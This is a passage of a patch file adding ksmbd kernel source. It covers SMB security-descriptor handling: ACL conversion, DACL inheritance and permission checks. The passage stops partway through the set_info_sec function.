++				posix_acl_alloc(default_acl_state.users->n +
++				default_acl_state.groups->n + 4, GFP_KERNEL);
++			if (fattr->cf_dacls) {
++				cf_pdace = fattr->cf_dacls->a_entries;
++				posix_state_to_acl(&default_acl_state, cf_pdace);
++			}
++		}
++	}
++	free_acl_state(&acl_state);
++	free_acl_state(&default_acl_state);
++}
++
++static void set_posix_acl_entries_dacl(struct user_namespace *user_ns,
++				       struct smb_ace *pndace,
++				       struct smb_fattr *fattr, u32 *num_aces,
++				       u16 *size, u32 nt_aces_num)
++{
++	struct posix_acl_entry *pace;
++	struct smb_sid *sid;
++	struct smb_ace *ntace;
++	int i, j;
++
++	if (!fattr->cf_acls)
++		goto posix_default_acl;
++
++	pace = fattr->cf_acls->a_entries;
++	for (i = 0; i < fattr->cf_acls->a_count; i++, pace++) {
++		int flags = 0;
++
++		sid = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
++		if (!sid)
++			break;
++
++		if (pace->e_tag == ACL_USER) {
++			uid_t uid;
++			unsigned int sid_type = SIDOWNER;
++
++			uid = posix_acl_uid_translate(user_ns, pace);
++			if (!uid)
++				sid_type = SIDUNIX_USER;
++			id_to_sid(uid, sid_type, sid);
++		} else if (pace->e_tag == ACL_GROUP) {
++			gid_t gid;
++
++			gid = posix_acl_gid_translate(user_ns, pace);
++			id_to_sid(gid, SIDUNIX_GROUP, sid);
++		} else if (pace->e_tag == ACL_OTHER && !nt_aces_num) {
++			smb_copy_sid(sid, &sid_everyone);
++		} else {
++			kfree(sid);
++			continue;
++		}
++		ntace = pndace;
++		for (j = 0; j < nt_aces_num; j++) {
++			if (ntace->sid.sub_auth[ntace->sid.num_subauth - 1] ==
++					sid->sub_auth[sid->num_subauth - 1])
++				goto pass_same_sid;
++			ntace = (struct smb_ace *)((char *)ntace +
++					le16_to_cpu(ntace->size));
++		}
++
++		if (S_ISDIR(fattr->cf_mode) && pace->e_tag == ACL_OTHER)
++			flags = 0x03;
++
++		ntace = (struct smb_ace *)((char *)pndace + *size);
++		*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED, flags,
++				pace->e_perm, 0777);
++		(*num_aces)++;
++		if (pace->e_tag == ACL_USER)
++			ntace->access_req |=
++				FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
++
++		if (S_ISDIR(fattr->cf_mode) &&
++		    (pace->e_tag == ACL_USER || pace->e_tag == ACL_GROUP)) {
++			ntace = (struct smb_ace *)((char *)pndace + *size);
++			*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED,
++					0x03, pace->e_perm, 0777);
++			(*num_aces)++;
++			if (pace->e_tag == ACL_USER)
++				ntace->access_req |=
++					FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
++		}
++
++pass_same_sid:
++		kfree(sid);
++	}
++
++	if (nt_aces_num)
++		return;
++
++posix_default_acl:
++	if (!fattr->cf_dacls)
++		return;
++
++	pace = fattr->cf_dacls->a_entries;
++	for (i = 0; i < fattr->cf_dacls->a_count; i++, pace++) {
++		sid = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
++		if (!sid)
++			break;
++
++		if (pace->e_tag == ACL_USER) {
++			uid_t uid;
++
++			uid = posix_acl_uid_translate(user_ns, pace);
++			id_to_sid(uid, SIDCREATOR_OWNER, sid);
++		} else if (pace->e_tag == ACL_GROUP) {
++			gid_t gid;
++
++			gid = posix_acl_gid_translate(user_ns, pace);
++			id_to_sid(gid, SIDCREATOR_GROUP, sid);
++		} else {
++			kfree(sid);
++			continue;
++		}
++
++		ntace = (struct smb_ace *)((char *)pndace + *size);
++		*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED, 0x0b,
++				pace->e_perm, 0777);
++		(*num_aces)++;
++		if (pace->e_tag == ACL_USER)
++			ntace->access_req |=
++				FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
++		kfree(sid);
++	}
++}
++
++static void set_ntacl_dacl(struct user_namespace *user_ns,
++			   struct smb_acl *pndacl,
++			   struct smb_acl *nt_dacl,
++			   unsigned int aces_size,
++			   const struct smb_sid *pownersid,
++			   const struct smb_sid *pgrpsid,
++			   struct smb_fattr *fattr)
++{
++	struct smb_ace *ntace, *pndace;
++	int nt_num_aces = le32_to_cpu(nt_dacl->num_aces), num_aces = 0;
++	unsigned short size = 0;
++	int i;
++
++	pndace = (struct smb_ace *)((char *)pndacl + sizeof(struct smb_acl));
++	if (nt_num_aces) {
++		ntace = (struct smb_ace *)((char *)nt_dacl + sizeof(struct smb_acl));
++		for (i = 0; i < nt_num_aces; i++) {
++			unsigned short nt_ace_size;
++
++			if (offsetof(struct smb_ace, access_req) > aces_size)
++				break;
++
++			nt_ace_size = le16_to_cpu(ntace->size);
++			if (nt_ace_size > aces_size)
++				break;
++
++			memcpy((char *)pndace + size, ntace, nt_ace_size);
++			size += nt_ace_size;
++			aces_size -= nt_ace_size;
++			ntace = (struct smb_ace *)((char *)ntace + nt_ace_size);
++			num_aces++;
++		}
++	}
++
++	set_posix_acl_entries_dacl(user_ns, pndace, fattr,
++				   &num_aces, &size, nt_num_aces);
++	pndacl->num_aces = cpu_to_le32(num_aces);
++	pndacl->size = cpu_to_le16(le16_to_cpu(pndacl->size) + size);
++}
++
++static void set_mode_dacl(struct user_namespace *user_ns,
++			  struct smb_acl *pndacl, struct smb_fattr *fattr)
++{
++	struct smb_ace *pace, *pndace;
++	u32 num_aces = 0;
++	u16 size = 0, ace_size = 0;
++	uid_t uid;
++	const struct smb_sid *sid;
++
++	pace = pndace = (struct smb_ace *)((char *)pndacl + sizeof(struct smb_acl));
++
++	if (fattr->cf_acls) {
++		set_posix_acl_entries_dacl(user_ns, pndace, fattr,
++					   &num_aces, &size, num_aces);
++		goto out;
++	}
++
++	/* owner RID */
++	uid = from_kuid(&init_user_ns, fattr->cf_uid);
++	if (uid)
++		sid = &server_conf.domain_sid;
++	else
++		sid = &sid_unix_users;
++	ace_size = fill_ace_for_sid(pace, sid, ACCESS_ALLOWED, 0,
++				    fattr->cf_mode, 0700);
++	pace->sid.sub_auth[pace->sid.num_subauth++] = cpu_to_le32(uid);
++	pace->size = cpu_to_le16(ace_size + 4);
++	size += le16_to_cpu(pace->size);
++	pace = (struct smb_ace *)((char *)pndace + size);
++
++	/* Group RID */
++	ace_size = fill_ace_for_sid(pace, &sid_unix_groups,
++				    ACCESS_ALLOWED, 0, fattr->cf_mode, 0070);
++	pace->sid.sub_auth[pace->sid.num_subauth++] =
++		cpu_to_le32(from_kgid(&init_user_ns, fattr->cf_gid));
++	pace->size = cpu_to_le16(ace_size + 4);
++	size += le16_to_cpu(pace->size);
++	pace = (struct smb_ace *)((char *)pndace + size);
++	num_aces = 3;
++
++	if (S_ISDIR(fattr->cf_mode)) {
++		pace = (struct smb_ace *)((char *)pndace + size);
++
++		/* creator owner */
++		size += fill_ace_for_sid(pace, &creator_owner, ACCESS_ALLOWED,
++					 0x0b, fattr->cf_mode, 0700);
++		pace = (struct smb_ace *)((char *)pndace + size);
++
++		/* creator group */
++		size += fill_ace_for_sid(pace, &creator_group, ACCESS_ALLOWED,
++					 0x0b, fattr->cf_mode, 0070);
++		pace = (struct smb_ace *)((char *)pndace + size);
++		num_aces = 5;
++	}
++
++	/* other */
++	size += fill_ace_for_sid(pace, &sid_everyone, ACCESS_ALLOWED, 0,
++				 fattr->cf_mode, 0007);
++
++out:
++	pndacl->num_aces = cpu_to_le32(num_aces);
++	pndacl->size = cpu_to_le16(le16_to_cpu(pndacl->size) + size);
++}
++
++static int parse_sid(struct smb_sid *psid, char *end_of_acl)
++{
++	/*
++	 * Validate that we do not go past the end of the ACL - a SID must be
++	 * at least 8 bytes long (assuming no sub-auths - e.g. the null SID).
++	 */
++	if (end_of_acl < (char *)psid + 8) {
++		pr_err("ACL too small to parse SID %p\n", psid);
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++/* Convert CIFS ACL to POSIX form */
++int parse_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
++		   int acl_len, struct smb_fattr *fattr)
++{
++	int rc = 0;
++	struct smb_sid *owner_sid_ptr, *group_sid_ptr;
++	struct smb_acl *dacl_ptr; /* no need for SACL ptr */
++	char *end_of_acl = ((char *)pntsd) + acl_len;
++	__u32 dacloffset;
++	int pntsd_type;
++
++	if (!pntsd)
++		return -EIO;
++
++	if (acl_len < sizeof(struct smb_ntsd))
++		return -EINVAL;
++
++	owner_sid_ptr = (struct smb_sid *)((char *)pntsd +
++			le32_to_cpu(pntsd->osidoffset));
++	group_sid_ptr = (struct smb_sid *)((char *)pntsd +
++			le32_to_cpu(pntsd->gsidoffset));
++	dacloffset = le32_to_cpu(pntsd->dacloffset);
++	dacl_ptr = (struct smb_acl *)((char *)pntsd + dacloffset);
++	ksmbd_debug(SMB,
++		    "revision %d type 0x%x ooffset 0x%x goffset 0x%x sacloffset 0x%x dacloffset 0x%x\n",
++		    pntsd->revision, pntsd->type, le32_to_cpu(pntsd->osidoffset),
++		    le32_to_cpu(pntsd->gsidoffset),
++		    le32_to_cpu(pntsd->sacloffset), dacloffset);
++
++	pntsd_type = le16_to_cpu(pntsd->type);
++	if (!(pntsd_type & DACL_PRESENT)) {
++		ksmbd_debug(SMB, "DACL_PRESENT in DACL type is not set\n");
++		return rc;
++	}
++
++	pntsd->type = cpu_to_le16(DACL_PRESENT);
++
++	if (pntsd->osidoffset) {
++		rc = parse_sid(owner_sid_ptr, end_of_acl);
++		if (rc) {
++			pr_err("%s: Error %d parsing Owner SID\n", __func__, rc);
++			return rc;
++		}
++
++		rc = sid_to_id(user_ns, owner_sid_ptr, SIDOWNER, fattr);
++		if (rc) {
++			pr_err("%s: Error %d mapping Owner SID to uid\n",
++			       __func__, rc);
++			owner_sid_ptr = NULL;
++		}
++	}
++
++	if (pntsd->gsidoffset) {
++		rc = parse_sid(group_sid_ptr, end_of_acl);
++		if (rc) {
++			pr_err("%s: Error %d mapping Owner SID to gid\n",
++			       __func__, rc);
++			return rc;
++		}
++		rc = sid_to_id(user_ns, group_sid_ptr, SIDUNIX_GROUP, fattr);
++		if (rc) {
++			pr_err("%s: Error %d mapping Group SID to gid\n",
++			       __func__, rc);
++			group_sid_ptr = NULL;
++		}
++	}
++
++	if ((pntsd_type & (DACL_AUTO_INHERITED | DACL_AUTO_INHERIT_REQ)) ==
++	    (DACL_AUTO_INHERITED | DACL_AUTO_INHERIT_REQ))
++		pntsd->type |= cpu_to_le16(DACL_AUTO_INHERITED);
++	if (pntsd_type & DACL_PROTECTED)
++		pntsd->type |= cpu_to_le16(DACL_PROTECTED);
++
++	if (dacloffset) {
++		parse_dacl(user_ns, dacl_ptr, end_of_acl,
++			   owner_sid_ptr, group_sid_ptr, fattr);
++	}
++
++	return 0;
++}
++
++/* Convert permission bits from mode to equivalent CIFS ACL */
++int build_sec_desc(struct user_namespace *user_ns,
++		   struct smb_ntsd *pntsd, struct smb_ntsd *ppntsd,
++		   int ppntsd_size, int addition_info, __u32 *secdesclen,
++		   struct smb_fattr *fattr)
++{
++	int rc = 0;
++	__u32 offset;
++	struct smb_sid *owner_sid_ptr, *group_sid_ptr;
++	struct smb_sid *nowner_sid_ptr, *ngroup_sid_ptr;
++	struct smb_acl *dacl_ptr = NULL; /* no need for SACL ptr */
++	uid_t uid;
++	gid_t gid;
++	unsigned int sid_type = SIDOWNER;
++
++	nowner_sid_ptr = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
++	if (!nowner_sid_ptr)
++		return -ENOMEM;
++
++	uid = from_kuid(&init_user_ns, fattr->cf_uid);
++	if (!uid)
++		sid_type = SIDUNIX_USER;
++	id_to_sid(uid, sid_type, nowner_sid_ptr);
++
++	ngroup_sid_ptr = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
++	if (!ngroup_sid_ptr) {
++		kfree(nowner_sid_ptr);
++		return -ENOMEM;
++	}
++
++	gid = from_kgid(&init_user_ns, fattr->cf_gid);
++	id_to_sid(gid, SIDUNIX_GROUP, ngroup_sid_ptr);
++
++	offset = sizeof(struct smb_ntsd);
++	pntsd->sacloffset = 0;
++	pntsd->revision = cpu_to_le16(1);
++	pntsd->type = cpu_to_le16(SELF_RELATIVE);
++	if (ppntsd)
++		pntsd->type |= ppntsd->type;
++
++	if (addition_info & OWNER_SECINFO) {
++		pntsd->osidoffset = cpu_to_le32(offset);
++		owner_sid_ptr = (struct smb_sid *)((char *)pntsd + offset);
++		smb_copy_sid(owner_sid_ptr, nowner_sid_ptr);
++		offset += 1 + 1 + 6 + (nowner_sid_ptr->num_subauth * 4);
++	}
++
++	if (addition_info & GROUP_SECINFO) {
++		pntsd->gsidoffset = cpu_to_le32(offset);
++		group_sid_ptr = (struct smb_sid *)((char *)pntsd + offset);
++		smb_copy_sid(group_sid_ptr, ngroup_sid_ptr);
++		offset += 1 + 1 + 6 + (ngroup_sid_ptr->num_subauth * 4);
++	}
++
++	if (addition_info & DACL_SECINFO) {
++		pntsd->type |= cpu_to_le16(DACL_PRESENT);
++		dacl_ptr = (struct smb_acl *)((char *)pntsd + offset);
++		dacl_ptr->revision = cpu_to_le16(2);
++		dacl_ptr->size = cpu_to_le16(sizeof(struct smb_acl));
++		dacl_ptr->num_aces = 0;
++
++		if (!ppntsd) {
++			set_mode_dacl(user_ns, dacl_ptr, fattr);
++		} else {
++			struct smb_acl *ppdacl_ptr;
++			unsigned int dacl_offset = le32_to_cpu(ppntsd->dacloffset);
++			int ppdacl_size, ntacl_size = ppntsd_size - dacl_offset;
++
++			if (!dacl_offset ||
++			    (dacl_offset + sizeof(struct smb_acl) > ppntsd_size))
++				goto out;
++
++			ppdacl_ptr = (struct smb_acl *)((char *)ppntsd + dacl_offset);
++			ppdacl_size = le16_to_cpu(ppdacl_ptr->size);
++			if (ppdacl_size > ntacl_size ||
++			    ppdacl_size < sizeof(struct smb_acl))
++				goto out;
++
++			set_ntacl_dacl(user_ns, dacl_ptr, ppdacl_ptr,
++				       ntacl_size - sizeof(struct smb_acl),
++				       nowner_sid_ptr, ngroup_sid_ptr,
++				       fattr);
++		}
++		pntsd->dacloffset = cpu_to_le32(offset);
++		offset += le16_to_cpu(dacl_ptr->size);
++	}
++
++out:
++	kfree(nowner_sid_ptr);
++	kfree(ngroup_sid_ptr);
++	*secdesclen = offset;
++	return rc;
++}
++
++static void smb_set_ace(struct smb_ace *ace, const struct smb_sid *sid, u8 type,
++			u8 flags, __le32 access_req)
++{
++	ace->type = type;
++	ace->flags = flags;
++	ace->access_req = access_req;
++	smb_copy_sid(&ace->sid, sid);
++	ace->size = cpu_to_le16(1 + 1 + 2 + 4 + 1 + 1 + 6 + (sid->num_subauth * 4));
++}
++
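++/*
++ * Build a security descriptor for a new file from the inheritable ACEs of
++ * the parent directory's DACL, resolving CREATOR OWNER/GROUP placeholders
++ * to @uid/@gid, and store it as a security xattr on the file.
++ */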
++int smb_inherit_dacl(struct ksmbd_conn *conn,
++		     const struct path *path,
++		     unsigned int uid, unsigned int gid)
++{
++	const struct smb_sid *psid, *creator = NULL;
++	struct smb_ace *parent_aces, *aces;
++	struct smb_acl *parent_pdacl;
++	struct smb_ntsd *parent_pntsd = NULL;
++	struct smb_sid owner_sid, group_sid;
++	struct dentry *parent = path->dentry->d_parent;
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	int inherited_flags = 0, flags = 0, i, ace_cnt = 0, nt_size = 0, pdacl_size;
++	int rc = 0, num_aces, dacloffset, pntsd_type, pntsd_size, acl_len, aces_size;
++	char *aces_base;
++	bool is_dir = S_ISDIR(d_inode(path->dentry)->i_mode);
++
++	pntsd_size = ksmbd_vfs_get_sd_xattr(conn, user_ns,
++					    parent, &parent_pntsd);
++	if (pntsd_size <= 0)
++		return -ENOENT;
++	dacloffset = le32_to_cpu(parent_pntsd->dacloffset);
++	if (!dacloffset || (dacloffset + sizeof(struct smb_acl) > pntsd_size)) {
++		rc = -EINVAL;
++		goto free_parent_pntsd;
++	}
++
++	parent_pdacl = (struct smb_acl *)((char *)parent_pntsd + dacloffset);
++	acl_len = pntsd_size - dacloffset;
++	num_aces = le32_to_cpu(parent_pdacl->num_aces);
++	pntsd_type = le16_to_cpu(parent_pntsd->type);
++	pdacl_size = le16_to_cpu(parent_pdacl->size);
++
++	if (pdacl_size > acl_len || pdacl_size < sizeof(struct smb_acl)) {
++		rc = -EINVAL;
++		goto free_parent_pntsd;
++	}
++
++	aces_base = kmalloc(sizeof(struct smb_ace) * num_aces * 2, GFP_KERNEL);
++	if (!aces_base) {
++		rc = -ENOMEM;
++		goto free_parent_pntsd;
++	}
++
++	aces = (struct smb_ace *)aces_base;
++	parent_aces = (struct smb_ace *)((char *)parent_pdacl +
++			sizeof(struct smb_acl));
++	aces_size = acl_len - sizeof(struct smb_acl);
++
++	if (pntsd_type & DACL_AUTO_INHERITED)
++		inherited_flags = INHERITED_ACE;
++
++	for (i = 0; i < num_aces; i++) {
++		int pace_size;
++
++		if (offsetof(struct smb_ace, access_req) > aces_size)
++			break;
++
++		pace_size = le16_to_cpu(parent_aces->size);
++		if (pace_size > aces_size)
++			break;
++
++		aces_size -= pace_size;
++
++		flags = parent_aces->flags;
++		if (!smb_inherit_flags(flags, is_dir))
++			goto pass;
++		if (is_dir) {
++			flags &= ~(INHERIT_ONLY_ACE | INHERITED_ACE);
++			if (!(flags & CONTAINER_INHERIT_ACE))
++				flags |= INHERIT_ONLY_ACE;
++			if (flags & NO_PROPAGATE_INHERIT_ACE)
++				flags = 0;
++		} else {
++			flags = 0;
++		}
++
++		if (!compare_sids(&creator_owner, &parent_aces->sid)) {
++			creator = &creator_owner;
++			id_to_sid(uid, SIDOWNER, &owner_sid);
++			psid = &owner_sid;
++		} else if (!compare_sids(&creator_group, &parent_aces->sid)) {
++			creator = &creator_group;
++			id_to_sid(gid, SIDUNIX_GROUP, &group_sid);
++			psid = &group_sid;
++		} else {
++			creator = NULL;
++			psid = &parent_aces->sid;
++		}
++
++		if (is_dir && creator && flags & CONTAINER_INHERIT_ACE) {
++			smb_set_ace(aces, psid, parent_aces->type, inherited_flags,
++				    parent_aces->access_req);
++			nt_size += le16_to_cpu(aces->size);
++			ace_cnt++;
++			aces = (struct smb_ace *)((char *)aces + le16_to_cpu(aces->size));
++			flags |= INHERIT_ONLY_ACE;
++			psid = creator;
++		} else if (is_dir && !(parent_aces->flags & NO_PROPAGATE_INHERIT_ACE)) {
++			psid = &parent_aces->sid;
++		}
++
++		smb_set_ace(aces, psid, parent_aces->type, flags | inherited_flags,
++			    parent_aces->access_req);
++		nt_size += le16_to_cpu(aces->size);
++		aces = (struct smb_ace *)((char *)aces + le16_to_cpu(aces->size));
++		ace_cnt++;
++pass:
++		parent_aces = (struct smb_ace *)((char *)parent_aces + pace_size);
++	}
++
++	if (nt_size > 0) {
++		struct smb_ntsd *pntsd;
++		struct smb_acl *pdacl;
++		struct smb_sid *powner_sid = NULL, *pgroup_sid = NULL;
++		int powner_sid_size = 0, pgroup_sid_size = 0, pntsd_size;
++
++		if (parent_pntsd->osidoffset) {
++			powner_sid = (struct smb_sid *)((char *)parent_pntsd +
++					le32_to_cpu(parent_pntsd->osidoffset));
++			powner_sid_size = 1 + 1 + 6 + (powner_sid->num_subauth * 4);
++		}
++		if (parent_pntsd->gsidoffset) {
++			pgroup_sid = (struct smb_sid *)((char *)parent_pntsd +
++					le32_to_cpu(parent_pntsd->gsidoffset));
++			pgroup_sid_size = 1 + 1 + 6 + (pgroup_sid->num_subauth * 4);
++		}
++
++		pntsd = kzalloc(sizeof(struct smb_ntsd) + powner_sid_size +
++				pgroup_sid_size + sizeof(struct smb_acl) +
++				nt_size, GFP_KERNEL);
++		if (!pntsd) {
++			rc = -ENOMEM;
++			goto free_aces_base;
++		}
++
++		pntsd->revision = cpu_to_le16(1);
++		pntsd->type = cpu_to_le16(SELF_RELATIVE | DACL_PRESENT);
++		if (le16_to_cpu(parent_pntsd->type) & DACL_AUTO_INHERITED)
++			pntsd->type |= cpu_to_le16(DACL_AUTO_INHERITED);
++		pntsd_size = sizeof(struct smb_ntsd);
++		pntsd->osidoffset = parent_pntsd->osidoffset;
++		pntsd->gsidoffset = parent_pntsd->gsidoffset;
++		pntsd->dacloffset = parent_pntsd->dacloffset;
++
++		if (pntsd->osidoffset) {
++			struct smb_sid *owner_sid = (struct smb_sid *)((char *)pntsd +
++					le32_to_cpu(pntsd->osidoffset));
++			memcpy(owner_sid, powner_sid, powner_sid_size);
++			pntsd_size += powner_sid_size;
++		}
++
++		if (pntsd->gsidoffset) {
++			struct smb_sid *group_sid = (struct smb_sid *)((char *)pntsd +
++					le32_to_cpu(pntsd->gsidoffset));
++			memcpy(group_sid, pgroup_sid, pgroup_sid_size);
++			pntsd_size += pgroup_sid_size;
++		}
++
++		if (pntsd->dacloffset) {
++			struct smb_ace *pace;
++
++			pdacl = (struct smb_acl *)((char *)pntsd + le32_to_cpu(pntsd->dacloffset));
++			pdacl->revision = cpu_to_le16(2);
++			pdacl->size = cpu_to_le16(sizeof(struct smb_acl) + nt_size);
++			pdacl->num_aces = cpu_to_le32(ace_cnt);
++			pace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
++			memcpy(pace, aces_base, nt_size);
++			pntsd_size += sizeof(struct smb_acl) + nt_size;
++		}
++
++		ksmbd_vfs_set_sd_xattr(conn, user_ns,
++				       path->dentry, pntsd, pntsd_size);
++		kfree(pntsd);
++	}
++
++free_aces_base:
++	kfree(aces_base);
++free_parent_pntsd:
++	kfree(parent_pntsd);
++	return rc;
++}
++
++bool smb_inherit_flags(int flags, bool is_dir)
++{
++	if (!is_dir)
++		return (flags & OBJECT_INHERIT_ACE) != 0;
++
++	if (flags & OBJECT_INHERIT_ACE && !(flags & NO_PROPAGATE_INHERIT_ACE))
++		return true;
++
++	if (flags & CONTAINER_INHERIT_ACE)
++		return true;
++	return false;
++}
++
++int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
++			__le32 *pdaccess, int uid)
++{
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	struct smb_ntsd *pntsd = NULL;
++	struct smb_acl *pdacl;
++	struct posix_acl *posix_acls;
++	int rc = 0, pntsd_size, acl_size, aces_size, pdacl_size, dacl_offset;
++	struct smb_sid sid;
++	int granted = le32_to_cpu(*pdaccess & ~FILE_MAXIMAL_ACCESS_LE);
++	struct smb_ace *ace;
++	int i, found = 0;
++	unsigned int access_bits = 0;
++	struct smb_ace *others_ace = NULL;
++	struct posix_acl_entry *pa_entry;
++	unsigned int sid_type = SIDOWNER;
++	unsigned short ace_size;
++
++	ksmbd_debug(SMB, "check permission using windows acl\n");
++	pntsd_size = ksmbd_vfs_get_sd_xattr(conn, user_ns,
++					    path->dentry, &pntsd);
++	if (pntsd_size <= 0 || !pntsd)
++		goto err_out;
++
++	dacl_offset = le32_to_cpu(pntsd->dacloffset);
++	if (!dacl_offset ||
++	    (dacl_offset + sizeof(struct smb_acl) > pntsd_size))
++		goto err_out;
++
++	pdacl = (struct smb_acl *)((char *)pntsd + le32_to_cpu(pntsd->dacloffset));
++	acl_size = pntsd_size - dacl_offset;
++	pdacl_size = le16_to_cpu(pdacl->size);
++
++	if (pdacl_size > acl_size || pdacl_size < sizeof(struct smb_acl))
++		goto err_out;
++
++	if (!pdacl->num_aces) {
++		if (!(pdacl_size - sizeof(struct smb_acl)) &&
++		    *pdaccess & ~(FILE_READ_CONTROL_LE | FILE_WRITE_DAC_LE)) {
++			rc = -EACCES;
++			goto err_out;
++		}
++		goto err_out;
++	}
++
++	if (*pdaccess & FILE_MAXIMAL_ACCESS_LE) {
++		granted = READ_CONTROL | WRITE_DAC | FILE_READ_ATTRIBUTES |
++			DELETE;
++
++		ace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
++		aces_size = acl_size - sizeof(struct smb_acl);
++		for (i = 0; i < le32_to_cpu(pdacl->num_aces); i++) {
++			if (offsetof(struct smb_ace, access_req) > aces_size)
++				break;
++			ace_size = le16_to_cpu(ace->size);
++			if (ace_size > aces_size)
++				break;
++			aces_size -= ace_size;
++			granted |= le32_to_cpu(ace->access_req);
++			ace = (struct smb_ace *)((char *)ace + le16_to_cpu(ace->size));
++		}
++
++		if (!pdacl->num_aces)
++			granted = GENERIC_ALL_FLAGS;
++	}
++
++	if (!uid)
++		sid_type = SIDUNIX_USER;
++	id_to_sid(uid, sid_type, &sid);
++
++	ace = (struct smb_ace *)((char *)pdacl + sizeof(struct smb_acl));
++	aces_size = acl_size - sizeof(struct smb_acl);
++	for (i = 0; i < le32_to_cpu(pdacl->num_aces); i++) {
++		if (offsetof(struct smb_ace, access_req) > aces_size)
++			break;
++		ace_size = le16_to_cpu(ace->size);
++		if (ace_size > aces_size)
++			break;
++		aces_size -= ace_size;
++
++		if (!compare_sids(&sid, &ace->sid) ||
++		    !compare_sids(&sid_unix_NFS_mode, &ace->sid)) {
++			found = 1;
++			break;
++		}
++		if (!compare_sids(&sid_everyone, &ace->sid))
++			others_ace = ace;
++
++		ace = (struct smb_ace *)((char *)ace + le16_to_cpu(ace->size));
++	}
++
++	if (*pdaccess & FILE_MAXIMAL_ACCESS_LE && found) {
++		granted = READ_CONTROL | WRITE_DAC | FILE_READ_ATTRIBUTES |
++			DELETE;
++
++		granted |= le32_to_cpu(ace->access_req);
++
++		if (!pdacl->num_aces)
++			granted = GENERIC_ALL_FLAGS;
++	}
++
++	if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
++		posix_acls = get_acl(d_inode(path->dentry), ACL_TYPE_ACCESS);
++		if (posix_acls && !found) {
++			unsigned int id = -1;
++
++			pa_entry = posix_acls->a_entries;
++			for (i = 0; i < posix_acls->a_count; i++, pa_entry++) {
++				if (pa_entry->e_tag == ACL_USER)
++					id = posix_acl_uid_translate(user_ns, pa_entry);
++				else if (pa_entry->e_tag == ACL_GROUP)
++					id = posix_acl_gid_translate(user_ns, pa_entry);
++				else
++					continue;
++
++				if (id == uid) {
++					mode_to_access_flags(pa_entry->e_perm,
++							     0777,
++							     &access_bits);
++					if (!access_bits)
++						access_bits =
++							SET_MINIMUM_RIGHTS;
++					posix_acl_release(posix_acls);
++					goto check_access_bits;
++				}
++			}
++		}
++		if (posix_acls)
++			posix_acl_release(posix_acls);
++	}
++
++	if (!found) {
++		if (others_ace) {
++			ace = others_ace;
++		} else {
++			ksmbd_debug(SMB, "Can't find corresponding sid\n");
++			rc = -EACCES;
++			goto err_out;
++		}
++	}
++
++	switch (ace->type) {
++	case ACCESS_ALLOWED_ACE_TYPE:
++		access_bits = le32_to_cpu(ace->access_req);
++		break;
++	case ACCESS_DENIED_ACE_TYPE:
++	case ACCESS_DENIED_CALLBACK_ACE_TYPE:
++		access_bits = le32_to_cpu(~ace->access_req);
++		break;
++	}
++
++check_access_bits:
++	if (granted &
++	    ~(access_bits | FILE_READ_ATTRIBUTES | READ_CONTROL | WRITE_DAC | DELETE)) {
++		ksmbd_debug(SMB, "Access denied with winACL, granted : %x, access_req : %x\n",
++			    granted, le32_to_cpu(ace->access_req));
++		rc = -EACCES;
++		goto err_out;
++	}
++
++	*pdaccess = cpu_to_le32(granted);
++err_out:
++	kfree(pntsd);
++	return rc;
++}
++
++int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
++		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
++		 bool type_check)
++{
++	int rc;
++	struct smb_fattr fattr = {{0}};
++	struct inode *inode = d_inode(path->dentry);
++	struct user_namespace *user_ns = mnt_user_ns(path->mnt);
++	struct iattr newattrs;
++
++	fattr.cf_uid = INVALID_UID;
++	fattr.cf_gid = INVALID_GID;
++	fattr.cf_mode = inode->i_mode;
++
++	rc = parse_sec_desc(user_ns, pntsd, ntsd_len, &fattr);
++	if (rc)
++		goto out;
++
++	newattrs.ia_valid = ATTR_CTIME;
++	if (!uid_eq(fattr.cf_uid, INVALID_UID)) {
++		newattrs.ia_valid |= ATTR_UID;
++		newattrs.ia_uid = fattr.cf_uid;
++	}
++	if (!gid_eq(fattr.cf_gid, INVALID_GID)) {
++		newattrs.ia_valid |= ATTR_GID;
++		newattrs.ia_gid = fattr.cf_gid;
++	}
++	newattrs.ia_valid |= ATTR_MODE;
++	newattrs.ia_mode = (inode->i_mode & ~0777) | (fattr.cf_mode & 0777);
++
++	ksmbd_vfs_remove_acl_xattrs(user_ns, path->dentry);
++	/* Update posix acls */
++	if (IS_ENABLED(CONFIG_FS_POSIX_ACL) && fattr.cf_dacls) {
++		rc = set_posix_acl(user_ns, inode,
++				   ACL_TYPE_ACCESS, fattr.cf_acls);
++		if (rc < 0)
++			ksmbd_debug(SMB,
++				    "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
++				    rc);
++		if (S_ISDIR(inode->i_mode) && fattr.cf_dacls) {
++			rc = set_posix_acl(user_ns, inode,
++					   ACL_TYPE_DEFAULT, fattr.cf_dacls);
++			if (rc)
++				ksmbd_debug(SMB,
++					    "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
++					    rc);
++		}
++	}
++
++	inode_lock(inode);
++	rc = notify_change(user_ns, path->dentry, &newattrs, NULL);
++	inode_unlock(inode);
++	if (rc)
++		goto out;
++
++	/* Check it only calling from SD BUFFER context */
++	if (type_check && !(le16_to_cpu(pntsd->type) & DACL_PRESENT))
++		goto out;
++
++	if (test_share_config_flag(tcon->share_conf, KSMBD_SHARE_FLAG_ACL_XATTR)) {
++		/* Update WinACL in xattr */
++		ksmbd_vfs_remove_sd_xattrs(user_ns, path->dentry);
++		ksmbd_vfs_set_sd_xattr(conn, user_ns,
++				       path->dentry, pntsd, ntsd_len);
++	}
++
++out:
++	posix_acl_release(fattr.cf_acls);
